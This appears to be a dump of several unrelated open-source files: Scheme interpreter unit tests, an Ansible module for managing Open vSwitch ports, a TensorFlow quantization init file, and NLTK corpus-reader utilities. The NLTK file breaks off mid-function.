        lambdaObject = eval_string('(lambda (n) n)')
        self.assertRaises(schemeExceptions.ArgumentCountException, call_lambda, lambdaObject, '10 20 30')
    def test_lambda_call_tooFewArguments(self):
        """Passing fewer arguments than parameters raises ArgumentCountException."""
        lambdaObject = eval_string('(lambda (n) n)')
        self.assertRaises(schemeExceptions.ArgumentCountException, call_lambda, lambdaObject)
    def test_lambda_makeAdder(self):
        """Closures capture their defining environment (classic make-adder)."""
        initialize.initialize()
        eval_string('(define make-adder (lambda(n) (lambda(x) (+ x n))))')
        eval_string('(define add10 (make-adder 10))')
        lambdaObject = eval_string('add10')
        self.assertRaises(schemeExceptions.NoBindingException, eval_string, 'n') # no global n
        obj = call_lambda(lambdaObject, '5')
        self.assertEqual(obj.type, 'schemeNumber', 'lambda should return type schemeNumber.')
        self.assertEqual(obj.value, 15, 'lambda should return schemeNumber 15.')
    def test_lambda_tak(self):
        """The tak recursion returns the right value and makes 17 calls for (4 0 1)."""
        initialize.initialize()
        eval_string('(define counter 0)')
        eval_string(''' (define (tak x y z)
                            (set! counter (+ counter 1))
                            (if (< y x)
                                (tak (tak (- x 1) y z) (tak (- y 1) z x) (tak (- z 1) x y))
                                z
                            )
                        )'''
                    )
        obj = eval_string('(tak 4 0 1)')
        self.assertEqual(obj.type, 'schemeNumber', 'tak should return a schemeNumber')
        # NOTE(review): the expected value is 0 but the failure message claims
        # "schemeNumber 1" -- the message looks stale; verify and fix upstream.
        self.assertEqual(obj.value, 0, 'tak should return schemeNumber 1 for arguments 4 0 1')
        c = eval_string('counter')
        self.assertEqual(c.type, 'schemeNumber', 'counter should be a number.')
        self.assertEqual(c.value, 17, 'the counter should be 17 for tak arguments 4 0 1')
    def test_lambda_equal(self):
        """Two distinct lambdas with identical bodies are not eq?."""
        initialize.initialize()
        eval_string('(define (f) 1)')
        eval_string('(define (g) 1)')
        obj = eval_string('(eq? g f)')
        # NOTE(review): the message mixes German ('und'); left unchanged because
        # assertion messages are runtime strings.
        self.assertEqual(obj.type, 'schemeFalse', 'g und f should not be equal.')
| mit |
fxfitz/ansible | lib/ansible/modules/network/ovs/openvswitch_port.py | 102 | 8041 | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2013, David Stygstra <david.stygstra@gmail.com>
# Portions copyright @ 2015 VMware, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Metadata consumed by Ansible tooling (docs/support classification); it is
# not read by the module code below at runtime.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'network'}
DOCUMENTATION = '''
---
module: openvswitch_port
version_added: 1.4
author: "David Stygstra (@stygstra)"
short_description: Manage Open vSwitch ports
requirements: [ ovs-vsctl ]
description:
- Manage Open vSwitch ports
options:
bridge:
required: true
description:
- Name of bridge to manage
port:
required: true
description:
- Name of port to manage on the bridge
tag:
version_added: 2.2
description:
- VLAN tag for this port. Must be a value between
0 and 4095.
state:
default: "present"
choices: [ present, absent ]
description:
- Whether the port should exist
timeout:
default: 5
description:
- How long to wait for ovs-vswitchd to respond
external_ids:
version_added: 2.0
default: {}
description:
- Dictionary of external_ids applied to a port.
set:
version_added: 2.0
description:
- Set a single property on a port.
'''
EXAMPLES = '''
# Creates port eth2 on bridge br-ex
- openvswitch_port:
bridge: br-ex
port: eth2
state: present
# Creates port eth6
- openvswitch_port:
bridge: bridge-loop
port: eth6
state: present
set: Interface eth6
# Creates port vlan10 with tag 10 on bridge br-ex
- openvswitch_port:
bridge: br-ex
port: vlan10
tag: 10
state: present
set: Interface vlan10
# Assign interface id server1-vifeth6 and mac address 00:00:5E:00:53:23
# to port vifeth6 and setup port to be managed by a controller.
- openvswitch_port:
bridge: br-int
port: vifeth6
state: present
args:
external_ids:
iface-id: '{{ inventory_hostname }}-vifeth6'
attached-mac: '00:00:5E:00:53:23'
vm-id: '{{ inventory_hostname }}'
iface-status: active
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
def _external_ids_to_dict(text):
text = text.strip()
if text == '{}':
return None
else:
d = {}
for kv in text[1:-1].split(','):
kv = kv.strip()
k, v = kv.split('=')
d[k] = v
return d
def _tag_to_str(text):
text = text.strip()
if text == '[]':
return None
else:
return text
def map_obj_to_commands(want, have, module):
    """Compute the ovs-vsctl commands that move the port from *have* to *want*.

    *want* and *have* are the dicts built by map_params_to_obj() and
    map_config_to_obj(); *have* is empty when the port does not exist.
    Command strings are rendered from %-templates against ``module.params``,
    which also carries the resolved 'ovs-vsctl' binary path and 'timeout'.
    Returns the (possibly empty) ordered list of command strings.
    """
    commands = list()

    if module.params['state'] == 'absent':
        # Desired state is absent: delete only if the port currently exists.
        if have:
            templatized_command = ("%(ovs-vsctl)s -t %(timeout)s del-port"
                                   " %(bridge)s %(port)s")
            command = templatized_command % module.params
            commands.append(command)
    else:
        if have:
            # Port already exists: emit only updates for fields that drifted.
            if want['tag'] != have['tag']:
                templatized_command = ("%(ovs-vsctl)s -t %(timeout)s"
                                       " set port %(port)s tag=%(tag)s")
                command = templatized_command % module.params
                commands.append(command)

            if want['external_ids'] != have['external_ids']:
                for k, v in iteritems(want['external_ids']):
                    # Touch a key only when it is new or its value changed.
                    if (not have['external_ids']
                            or k not in have['external_ids']
                            or want['external_ids'][k] != have['external_ids'][k]):
                        if v is None:
                            # A None value requests removal of the key.
                            templatized_command = ("%(ovs-vsctl)s -t %(timeout)s"
                                                   " remove port %(port)s"
                                                   " external_ids " + k)
                            command = templatized_command % module.params
                            commands.append(command)
                        else:
                            templatized_command = ("%(ovs-vsctl)s -t %(timeout)s"
                                                   " set port %(port)s"
                                                   " external_ids:")
                            command = templatized_command % module.params
                            command += k + "=" + v
                            commands.append(command)
        else:
            # Port is missing: create it; tag and the optional '-- set <...>'
            # clause are folded into the same add-port invocation.
            templatized_command = ("%(ovs-vsctl)s -t %(timeout)s add-port"
                                   " %(bridge)s %(port)s")
            command = templatized_command % module.params

            if want['tag']:
                templatized_command = " tag=%(tag)s"
                command += templatized_command % module.params

            if want['set']:
                templatized_command = " -- set %(set)s"
                command += templatized_command % module.params

            commands.append(command)

            if want['external_ids']:
                # Each external_id is applied with its own 'set port' command.
                for k, v in iteritems(want['external_ids']):
                    templatized_command = ("%(ovs-vsctl)s -t %(timeout)s"
                                           " set port %(port)s external_ids:")
                    command = templatized_command % module.params
                    command += k + "=" + v
                    commands.append(command)

    return commands
def map_config_to_obj(module):
    """Query ovs-vsctl for the current state of the managed port.

    Returns an empty dict when the port is not attached to the bridge;
    otherwise a dict with 'bridge', 'port', 'tag' and 'external_ids'
    (the latter two normalized through _tag_to_str/_external_ids_to_dict).
    """
    params = module.params

    list_cmd = "%(ovs-vsctl)s -t %(timeout)s list-ports %(bridge)s" % params
    rc, out, err = module.run_command(list_cmd, check_rc=True)
    # NOTE(review): check_rc=True already fails the module on rc != 0, so this
    # branch is defensive; kept to preserve the original behavior.
    if rc != 0:
        module.fail_json(msg=err)

    if params['port'] not in out.splitlines():
        return {}

    obj = {'bridge': params['bridge'], 'port': params['port']}

    tag_cmd = "%(ovs-vsctl)s -t %(timeout)s get Port %(port)s tag" % params
    rc, out, err = module.run_command(tag_cmd, check_rc=True)
    obj['tag'] = _tag_to_str(out)

    ids_cmd = "%(ovs-vsctl)s -t %(timeout)s get Port %(port)s external_ids" % params
    rc, out, err = module.run_command(ids_cmd, check_rc=True)
    obj['external_ids'] = _external_ids_to_dict(out)

    return obj
def map_params_to_obj(module):
    """Collect the desired port configuration from the module parameters.

    Only the keys that describe the port itself are copied; parameters such
    as 'state' and 'timeout' are intentionally excluded.
    """
    wanted_keys = ('bridge', 'port', 'tag', 'external_ids', 'set')
    return {key: module.params[key] for key in wanted_keys}
def main():
    """Module entry point: diff desired vs. current state and apply commands."""
    argument_spec = dict(
        bridge=dict(required=True),
        port=dict(required=True),
        state=dict(default='present', choices=['present', 'absent']),
        timeout=dict(default=5, type='int'),
        external_ids=dict(default=None, type='dict'),
        tag=dict(default=None),
        set=dict(required=False, default=None),
    )
    module = AnsibleModule(argument_spec=argument_spec,
                           supports_check_mode=True)

    # Resolve ovs-vsctl once and stash it in params so the templatized
    # commands can reference it via %(ovs-vsctl)s.
    module.params["ovs-vsctl"] = module.get_bin_path("ovs-vsctl", True)

    desired = map_params_to_obj(module)
    current = map_config_to_obj(module)
    commands = map_obj_to_commands(desired, current, module)

    result = {'changed': False, 'commands': commands}
    if commands:
        if not module.check_mode:
            for command in commands:
                module.run_command(command, check_rc=True)
        result['changed'] = True

    module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
sugartom/tensorflow-alien | tensorflow/contrib/quantization/__init__.py | 178 | 1441 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for building quantized models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import,g-bad-import-order
from tensorflow.contrib.quantization.python import array_ops as quantized_array_ops
from tensorflow.contrib.quantization.python.math_ops import *
from tensorflow.contrib.quantization.python.nn_ops import *
from tensorflow.python.ops import gen_array_ops as quantized_gen_array_ops
from tensorflow.python.ops.gen_array_ops import dequantize
from tensorflow.python.ops.gen_array_ops import quantize_v2
from tensorflow.python.ops.gen_array_ops import quantized_concat
# pylint: enable=unused-import,wildcard-import,g-bad-import-order
| apache-2.0 |
Jaemu/haiku.py | nltk/corpus/reader/util.py | 5 | 31153 | # Natural Language Toolkit: Corpus Reader Utilities
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Steven Bird <sb@ldc.upenn.edu>
# Edward Loper <edloper@gradient.cis.upenn.edu>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
import os
import sys
import bisect
import re
import tempfile
try: import cPickle as pickle
except ImportError: import pickle
from itertools import islice
# Use the c version of ElementTree, which is faster, if possible:
try: from xml.etree import cElementTree as ElementTree
except ImportError: from xml.etree import ElementTree
from nltk.tokenize import wordpunct_tokenize
from nltk.internals import slice_bounds
from nltk.data import PathPointer, FileSystemPathPointer, ZipFilePathPointer
from nltk.data import SeekableUnicodeStreamReader
from nltk.sourcedstring import SourcedStringStream
from nltk.util import AbstractLazySequence, LazySubsequence, LazyConcatenation, py25
######################################################################
#{ Corpus View
######################################################################
class StreamBackedCorpusView(AbstractLazySequence):
    """
    A 'view' of a corpus file, which acts like a sequence of tokens:
    it can be accessed by index, iterated over, etc. However, the
    tokens are only constructed as-needed -- the entire corpus is
    never stored in memory at once.

    The constructor to ``StreamBackedCorpusView`` takes two arguments:
    a corpus fileid (specified as a string or as a ``PathPointer``);
    and a block reader. A "block reader" is a function that reads
    zero or more tokens from a stream, and returns them as a list. A
    very simple example of a block reader is:

        >>> def simple_block_reader(stream):
        ...     return stream.readline().split()

    This simple block reader reads a single line at a time, and
    returns a single token (consisting of a string) for each
    whitespace-separated substring on the line.

    When deciding how to define the block reader for a given
    corpus, careful consideration should be given to the size of
    blocks handled by the block reader. Smaller block sizes will
    increase the memory requirements of the corpus view's internal
    data structures (by 2 integers per block). On the other hand,
    larger block sizes may decrease performance for random access to
    the corpus. (But note that larger block sizes will *not*
    decrease performance for iteration.)

    Internally, ``CorpusView`` maintains a partial mapping from token
    index to file position, with one entry per block. When a token
    with a given index *i* is requested, the ``CorpusView`` constructs
    it as follows:

    1. First, it searches the toknum/filepos mapping for the token
       index closest to (but less than or equal to) *i*.

    2. Then, starting at the file position corresponding to that
       index, it reads one block at a time using the block reader
       until it reaches the requested token.

    The toknum/filepos mapping is created lazily: it is initially
    empty, but every time a new block is read, the block's
    initial token is added to the mapping. (Thus, the toknum/filepos
    map has one entry per block.)

    In order to increase efficiency for random access patterns that
    have high degrees of locality, the corpus view may cache one or
    more blocks.

    :note: Each ``CorpusView`` object internally maintains an open file
        object for its underlying corpus file. This file should be
        automatically closed when the ``CorpusView`` is garbage collected,
        but if you wish to close it manually, use the ``close()``
        method. If you access a ``CorpusView``'s items after it has been
        closed, the file object will be automatically re-opened.

    :warning: If the contents of the file are modified during the
        lifetime of the ``CorpusView``, then the ``CorpusView``'s behavior
        is undefined.

    :warning: If a unicode encoding is specified when constructing a
        ``CorpusView``, then the block reader may only call
        ``stream.seek()`` with offsets that have been returned by
        ``stream.tell()``; in particular, calling ``stream.seek()`` with
        relative offsets, or with offsets based on string lengths, may
        lead to incorrect behavior.

    :ivar _block_reader: The function used to read
        a single block from the underlying file stream.
    :ivar _toknum: A list containing the token index of each block
        that has been processed. In particular, ``_toknum[i]`` is the
        token index of the first token in block ``i``. Together
        with ``_filepos``, this forms a partial mapping between token
        indices and file positions.
    :ivar _filepos: A list containing the file position of each block
        that has been processed. In particular, ``_toknum[i]`` is the
        file position of the first character in block ``i``. Together
        with ``_toknum``, this forms a partial mapping between token
        indices and file positions.
    :ivar _stream: The stream used to access the underlying corpus file.
    :ivar _len: The total number of tokens in the corpus, if known;
        or None, if the number of tokens is not yet known.
    :ivar _eofpos: The character position of the last character in the
        file. This is calculated when the corpus view is initialized,
        and is used to decide when the end of file has been reached.
    :ivar _cache: A cache of the most recently read block. It
        is encoded as a tuple (start_toknum, end_toknum, tokens), where
        start_toknum is the token index of the first token in the block;
        end_toknum is the token index of the first token not in the
        block; and tokens is a list of the tokens in the block.
    """

    def __init__(self, fileid, block_reader=None, startpos=0,
                 encoding=None, source=None):
        """
        Create a new corpus view, based on the file ``fileid``, and
        read with ``block_reader``. See the class documentation
        for more information.

        :param fileid: The path to the file that is read by this
            corpus view. ``fileid`` can either be a string or a
            ``PathPointer``.

        :param startpos: The file position at which the view will
            start reading. This can be used to skip over preface
            sections.

        :param encoding: The unicode encoding that should be used to
            read the file's contents. If no encoding is specified,
            then the file's contents will be read as a non-unicode
            string (i.e., a str).

        :param source: If specified, then use an ``SourcedStringStream``
            to annotate all strings read from the file with
            information about their start offset, end ofset,
            and docid. The value of ``source`` will be used as the docid.
        """
        # The block reader may be supplied either as a constructor
        # argument or by overriding read_block() in a subclass.
        if block_reader:
            self.read_block = block_reader
        # Initialize our toknum/filepos mapping.
        self._toknum = [0]
        self._filepos = [startpos]
        self._encoding = encoding
        self._source = source
        # We don't know our length (number of tokens) yet.
        self._len = None
        self._fileid = fileid
        self._stream = None
        self._current_toknum = None
        """This variable is set to the index of the next token that
        will be read, immediately before ``self.read_block()`` is
        called. This is provided for the benefit of the block
        reader, which under rare circumstances may need to know
        the current token number."""
        self._current_blocknum = None
        """This variable is set to the index of the next block that
        will be read, immediately before ``self.read_block()`` is
        called. This is provided for the benefit of the block
        reader, which under rare circumstances may need to know
        the current block number."""
        # Find the length of the file.
        try:
            if isinstance(self._fileid, PathPointer):
                self._eofpos = self._fileid.file_size()
            else:
                self._eofpos = os.stat(self._fileid).st_size
        except Exception as exc:
            raise ValueError('Unable to open or access %r -- %s' %
                             (fileid, exc))
        # Maintain a cache of the most recently read block, to
        # increase efficiency of random access.
        self._cache = (-1, -1, None)

    fileid = property(lambda self: self._fileid, doc="""
        The fileid of the file that is accessed by this view.

        :type: str or PathPointer""")

    def read_block(self, stream):
        """
        Read a block from the input stream.

        :return: a block of tokens from the input stream
        :rtype: list(any)
        :param stream: an input stream
        :type stream: stream
        """
        raise NotImplementedError('Abstract Method')

    def _open(self):
        """
        Open the file stream associated with this corpus view. This
        will be called performed if any value is read from the view
        while its file stream is closed.
        """
        if isinstance(self._fileid, PathPointer):
            self._stream = self._fileid.open(self._encoding)
        elif self._encoding:
            self._stream = SeekableUnicodeStreamReader(
                open(self._fileid, 'rb'), self._encoding)
        else:
            self._stream = open(self._fileid, 'rb')
        if self._source is not None:
            self._stream = SourcedStringStream(self._stream, self._source)

    def close(self):
        """
        Close the file stream associated with this corpus view. This
        can be useful if you are worried about running out of file
        handles (although the stream should automatically be closed
        upon garbage collection of the corpus view). If the corpus
        view is accessed after it is closed, it will be automatically
        re-opened.
        """
        if self._stream is not None:
            self._stream.close()
        self._stream = None

    def __len__(self):
        if self._len is None:
            # iterate_from() sets self._len when it reaches the end
            # of the file:
            for tok in self.iterate_from(self._toknum[-1]): pass
        return self._len

    def __getitem__(self, i):
        if isinstance(i, slice):
            start, stop = slice_bounds(self, i)
            # Check if it's in the cache.
            offset = self._cache[0]
            if offset <= start and stop <= self._cache[1]:
                return self._cache[2][start-offset:stop-offset]
            # Construct & return the result.
            return LazySubsequence(self, start, stop)
        else:
            # Handle negative indices
            if i < 0: i += len(self)
            if i < 0: raise IndexError('index out of range')
            # Check if it's in the cache.
            offset = self._cache[0]
            if offset <= i < self._cache[1]:
                return self._cache[2][i-offset]
            # Use iterate_from to extract it.
            try:
                # NOTE: ``.next()`` is the Python 2 iterator protocol;
                # this file targets Python 2 (it also uses ``unicode``
                # and ``basestring`` elsewhere).
                return self.iterate_from(i).next()
            except StopIteration:
                raise IndexError('index out of range')

    # If we wanted to be thread-safe, then this method would need to
    # do some locking.
    def iterate_from(self, start_tok):
        # Start by feeding from the cache, if possible.
        if self._cache[0] <= start_tok < self._cache[1]:
            for tok in self._cache[2][start_tok-self._cache[0]:]:
                yield tok
                start_tok += 1
        # Decide where in the file we should start. If `start` is in
        # our mapping, then we can jump straight to the correct block;
        # otherwise, start at the last block we've processed.
        if start_tok < self._toknum[-1]:
            block_index = bisect.bisect_right(self._toknum, start_tok)-1
            toknum = self._toknum[block_index]
            filepos = self._filepos[block_index]
        else:
            block_index = len(self._toknum)-1
            toknum = self._toknum[-1]
            filepos = self._filepos[-1]
        # Open the stream, if it's not open already.
        if self._stream is None:
            self._open()
        # Each iteration through this loop, we read a single block
        # from the stream.
        while filepos < self._eofpos:
            # Read the next block.
            self._stream.seek(filepos)
            self._current_toknum = toknum
            self._current_blocknum = block_index
            tokens = self.read_block(self._stream)
            assert isinstance(tokens, (tuple, list, AbstractLazySequence)), (
                'block reader %s() should return list or tuple.' %
                self.read_block.__name__)
            num_toks = len(tokens)
            new_filepos = self._stream.tell()
            assert new_filepos > filepos, (
                'block reader %s() should consume at least 1 byte (filepos=%d)' %
                (self.read_block.__name__, filepos))
            # Update our cache.
            self._cache = (toknum, toknum+num_toks, list(tokens))
            # Update our mapping.
            assert toknum <= self._toknum[-1]
            if num_toks > 0:
                block_index += 1
                if toknum == self._toknum[-1]:
                    assert new_filepos > self._filepos[-1] # monotonic!
                    self._filepos.append(new_filepos)
                    self._toknum.append(toknum+num_toks)
                else:
                    # Check for consistency:
                    assert new_filepos == self._filepos[block_index], (
                        'inconsistent block reader (num chars read)')
                    assert toknum+num_toks == self._toknum[block_index], (
                        'inconsistent block reader (num tokens returned)')
            # If we reached the end of the file, then update self._len
            if new_filepos == self._eofpos:
                self._len = toknum + num_toks
            # Generate the tokens in this block (but skip any tokens
            # before start_tok). Note that between yields, our state
            # may be modified.
            for tok in tokens[max(0, start_tok-toknum):]:
                yield tok
            # If we're at the end of the file, then we're done.
            assert new_filepos <= self._eofpos
            if new_filepos == self._eofpos:
                break
            # Update our indices
            toknum += num_toks
            filepos = new_filepos
        # If we reach this point, then we should know our length.
        assert self._len is not None

    # Use concat for these, so we can use a ConcatenatedCorpusView
    # when possible.
    def __add__(self, other):
        return concat([self, other])
    def __radd__(self, other):
        return concat([other, self])
    def __mul__(self, count):
        return concat([self] * count)
    def __rmul__(self, count):
        return concat([self] * count)
class ConcatenatedCorpusView(AbstractLazySequence):
    """
    A 'view' of a corpus file that joins together one or more
    ``StreamBackedCorpusViews<StreamBackedCorpusView>``. At most
    one file handle is left open at any time.
    """
    def __init__(self, corpus_views):
        self._pieces = corpus_views
        """A list of the corpus subviews that make up this
        concatenation."""
        self._offsets = [0]
        """A list of offsets, indicating the index at which each
        subview begins. In particular::
            offsets[i] = sum([len(p) for p in pieces[:i]])"""
        self._open_piece = None
        """The most recently accessed corpus subview (or None).
        Before a new subview is accessed, this subview will be closed."""

    def __len__(self):
        # The offset table has one more entry than there are completed
        # pieces; once it is longer than _pieces, every piece's length
        # is known and _offsets[-1] is the total.
        if len(self._offsets) <= len(self._pieces):
            # Iterate to the end of the corpus.
            for tok in self.iterate_from(self._offsets[-1]): pass
        return self._offsets[-1]

    def close(self):
        """Close the file streams of all subviews."""
        for piece in self._pieces:
            piece.close()

    def iterate_from(self, start_tok):
        piecenum = bisect.bisect_right(self._offsets, start_tok)-1
        while piecenum < len(self._pieces):
            offset = self._offsets[piecenum]
            piece = self._pieces[piecenum]
            # If we've got another piece open, close it first.
            if self._open_piece is not piece:
                if self._open_piece is not None:
                    self._open_piece.close()
                self._open_piece = piece
            # Get everything we can from this piece.
            for tok in piece.iterate_from(max(0, start_tok-offset)):
                yield tok
            # Update the offset table.
            if piecenum+1 == len(self._offsets):
                self._offsets.append(self._offsets[-1] + len(piece))
            # Move on to the next piece.
            piecenum += 1
def concat(docs):
    """
    Concatenate together the contents of multiple documents from a
    single corpus, using an appropriate concatenation function. This
    utility function is used by corpus readers when the user requests
    more than one document at a time.
    """
    if len(docs) == 1:
        return docs[0]
    if len(docs) == 0:
        raise ValueError('concat() expects at least one object!')

    types = set([d.__class__ for d in docs])

    # If they're all strings, use string concatenation.
    # (``unicode``/``basestring`` and the builtin ``reduce`` are
    # Python 2 names; this module predates Python 3 support.)
    if types.issubset([str, unicode, basestring]):
        return reduce((lambda a,b:a+b), docs, '')

    # If they're all corpus views, then use ConcatenatedCorpusView.
    # (The for/else idiom: the else runs only when no type failed the
    # issubclass test.)
    for typ in types:
        if not issubclass(typ, (StreamBackedCorpusView,
                                ConcatenatedCorpusView)):
            break
    else:
        return ConcatenatedCorpusView(docs)

    # If they're all lazy sequences, use a lazy concatenation
    for typ in types:
        if not issubclass(typ, AbstractLazySequence):
            break
    else:
        return LazyConcatenation(docs)

    # Otherwise, see what we can do:
    if len(types) == 1:
        typ = list(types)[0]
        if issubclass(typ, list):
            return reduce((lambda a,b:a+b), docs, [])
        if issubclass(typ, tuple):
            return reduce((lambda a,b:a+b), docs, ())
        # NOTE(review): ``iselement`` is called on the *class* here, not
        # on an instance -- confirm this actually detects Element types.
        if ElementTree.iselement(typ):
            xmltree = ElementTree.Element('documents')
            for doc in docs: xmltree.append(doc)
            return xmltree

    # No method found!
    raise ValueError("Don't know how to concatenate types: %r" % types)
######################################################################
#{ Corpus View for Pickled Sequences
######################################################################
class PickleCorpusView(StreamBackedCorpusView):
    """
    A stream backed corpus view for corpus files that consist of
    sequences of serialized Python objects (serialized using
    ``pickle.dump``). One use case for this class is to store the
    result of running feature detection on a corpus to disk. This can
    be useful when performing feature detection is expensive (so we
    don't want to repeat it); but the corpus is too large to store in
    memory. The following example illustrates this technique:

    .. doctest::
        :options: +SKIP

        >>> from nltk.corpus.reader.util import PickleCorpusView
        >>> from nltk.util import LazyMap
        >>> feature_corpus = LazyMap(detect_features, corpus)
        >>> PickleCorpusView.write(feature_corpus, some_fileid)
        >>> pcv = PickleCorpusView(some_fileid)
    """
    # Number of pickled objects returned per block read.
    BLOCK_SIZE = 100
    # Pickle protocol: -1 selects the highest available protocol.
    PROTOCOL = -1

    def __init__(self, fileid, delete_on_gc=False):
        """
        Create a new corpus view that reads the pickle corpus
        ``fileid``.

        :param delete_on_gc: If true, then ``fileid`` will be deleted
            whenever this object gets garbage-collected.
        """
        self._delete_on_gc = delete_on_gc
        StreamBackedCorpusView.__init__(self, fileid)

    def read_block(self, stream):
        # Read up to BLOCK_SIZE pickled objects; stop early at EOF.
        result = []
        for i in range(self.BLOCK_SIZE):
            try: result.append(pickle.load(stream))
            except EOFError: break
        return result

    def __del__(self):
        """
        If ``delete_on_gc`` was set to true when this
        ``PickleCorpusView`` was created, then delete the corpus view's
        fileid. (This method is called whenever a
        ``PickledCorpusView`` is garbage-collected.
        """
        if getattr(self, '_delete_on_gc'):
            if os.path.exists(self._fileid):
                try: os.remove(self._fileid)
                except (OSError, IOError): pass
        self.__dict__.clear() # make the garbage collector's job easier

    @classmethod
    def write(cls, sequence, output_file):
        """Pickle each item of *sequence* to *output_file* (a path or
        an open binary file object)."""
        # ``basestring`` is the Python 2 string base class.
        if isinstance(output_file, basestring):
            output_file = open(output_file, 'wb')
        for item in sequence:
            pickle.dump(item, output_file, cls.PROTOCOL)

    @classmethod
    def cache_to_tempfile(cls, sequence, delete_on_gc=True):
        """
        Write the given sequence to a temporary file as a pickle
        corpus; and then return a ``PickleCorpusView`` view for that
        temporary corpus file.

        :param delete_on_gc: If true, then the temporary file will be
            deleted whenever this object gets garbage-collected.
        """
        try:
            fd, output_file_name = tempfile.mkstemp('.pcv', 'nltk-')
            output_file = os.fdopen(fd, 'wb')
            cls.write(sequence, output_file)
            output_file.close()
            return PickleCorpusView(output_file_name, delete_on_gc)
        except (OSError, IOError) as e:
            raise ValueError('Error while creating temp file: %s' % e)
######################################################################
#{ Block Readers
######################################################################
def read_whitespace_block(stream):
    """Read up to 20 lines from *stream* and return their
    whitespace-separated tokens as a flat list."""
    lines = [stream.readline() for _ in range(20)]
    return [token for line in lines for token in line.split()]
def read_wordpunct_block(stream):
    """Read up to 20 lines from *stream*, tokenized with
    ``wordpunct_tokenize``, as a flat list."""
    lines = [stream.readline() for _ in range(20)]
    return [token for line in lines for token in wordpunct_tokenize(line)]
def read_line_block(stream):
    """Read up to 20 lines from *stream*, without trailing newlines.

    Stops early when the end of the file is reached.
    """
    lines = []
    for _ in range(20):
        line = stream.readline()
        if not line:
            break
        lines.append(line.rstrip('\n'))
    return lines
def read_blankline_block(stream):
    """Read one paragraph (lines up to the next blank line) from *stream*.

    Leading blank lines are skipped; an empty list is returned at end
    of file.
    """
    collected = []
    while True:
        line = stream.readline()
        if not line:
            # End of file: return what we have, if anything.
            return [''.join(collected)] if collected else []
        if not line.strip():
            # A blank line terminates a non-empty paragraph.
            if collected:
                return [''.join(collected)]
        else:
            collected.append(line)
def read_alignedsent_block(stream):
    """Read one aligned-sentence block from *stream*.

    Lines are accumulated until a line beginning with an ``N-N``
    alignment pair is seen, which ends the block. Separator lines
    (starting with '=') and blank lines are skipped.

    :return: a one-element list containing the block, or an empty list
        at end of file.
    """
    s = ''
    while True:
        line = stream.readline()
        # End of file. This must be tested *before* indexing into the
        # line: the previous version did ``line[0]`` first, which raised
        # IndexError on the empty string that readline() returns at EOF.
        if not line:
            return [s] if s else []
        # Separator or blank line:
        if line.startswith(('=', '\n', '\r\n')):
            continue
        # Content line:
        s += line
        if re.match(r'^\d+-\d+', line) is not None:
            return [s]
def read_regexp_block(stream, start_re, end_re=None):
    """
    Read a sequence of tokens from a stream, where tokens begin with
    lines that match ``start_re``. If ``end_re`` is specified, then
    tokens end with lines that match ``end_re``; otherwise, tokens end
    whenever the next line matching ``start_re`` or EOF is found.
    """
    # Skip ahead until the first line matching the start regexp.
    while True:
        line = stream.readline()
        if not line:
            return []  # end of file.
        if re.match(start_re, line):
            break
    collected = [line]
    # Accumulate lines until the token's end is found.
    while True:
        pos_before = stream.tell()
        line = stream.readline()
        if not line:
            # End of file ends the token.
            return [''.join(collected)]
        if end_re is not None and re.match(end_re, line):
            # An explicit end marker ends the token (and is consumed).
            return [''.join(collected)]
        if end_re is None and re.match(start_re, line):
            # The next token's start line ends this token; rewind so the
            # next call sees that start line again.
            stream.seek(pos_before)
            return [''.join(collected)]
        collected.append(line)
def read_sexpr_block(stream, block_size=16384, comment_char=None):
    """
    Read a sequence of s-expressions from the stream, and leave the
    stream's file position at the end the last complete s-expression
    read. This function will always return at least one s-expression,
    unless there are no more s-expressions in the file.

    If the file ends in in the middle of an s-expression, then that
    incomplete s-expression is returned when the end of the file is
    reached.

    :param block_size: The default block size for reading. If an
        s-expression is longer than one block, then more than one
        block will be read.
    :param comment_char: A character that marks comments. Any lines
        that begin with this character will be stripped out.
        (If spaces or tabs precede the comment character, then the
        line will not be stripped.)
    """
    start = stream.tell()
    block = stream.read(block_size)
    encoding = getattr(stream, 'encoding', None)
    assert encoding is not None or isinstance(block, str)
    if encoding not in (None, 'utf-8'):
        import warnings
        warnings.warn('Parsing may fail, depending on the properties '
                      'of the %s encoding!' % encoding)
        # (e.g., the utf-16 encoding does not work because it insists
        # on adding BOMs to the beginning of encoded strings.)
    if comment_char:
        COMMENT = re.compile('(?m)^%s.*$' % re.escape(comment_char))
    while True:
        try:
            # If we're stripping comments, then make sure our block ends
            # on a line boundary; and then replace any comments with
            # space characters. (We can't just strip them out -- that
            # would make our offset wrong.)
            if comment_char:
                block += stream.readline()
                block = re.sub(COMMENT, _sub_space, block)
            # Read the block.
            tokens, offset = _parse_sexpr_block(block)
            # Skip whitespace
            offset = re.compile(r'\s*').search(block, offset).end()
            # Move to the end position. With an encoded stream, the
            # seek offset must be expressed in encoded bytes.
            if encoding is None:
                stream.seek(start+offset)
            else:
                stream.seek(start+len(block[:offset].encode(encoding)))
            # Return the list of tokens we processed
            return tokens
        except ValueError as e:
            # _parse_sexpr_block signals a truncated first s-expression
            # with ValueError('Block too small'); grow the block and retry.
            if e.args[0] == 'Block too small':
                next_block = stream.read(block_size)
                if next_block:
                    block += next_block
                    continue
                else:
                    # The file ended mid-sexpr -- return what we got.
                    return [block.strip()]
            else: raise
def _sub_space(m):
"""Helper function: given a regexp match, return a string of
spaces that's the same length as the matched string."""
return ' '*(m.end()-m.start())
def _parse_sexpr_block(block):
tokens = []
start = end = 0
while end < len(block):
m = re.compile(r'\S').search(block, end)
if not m:
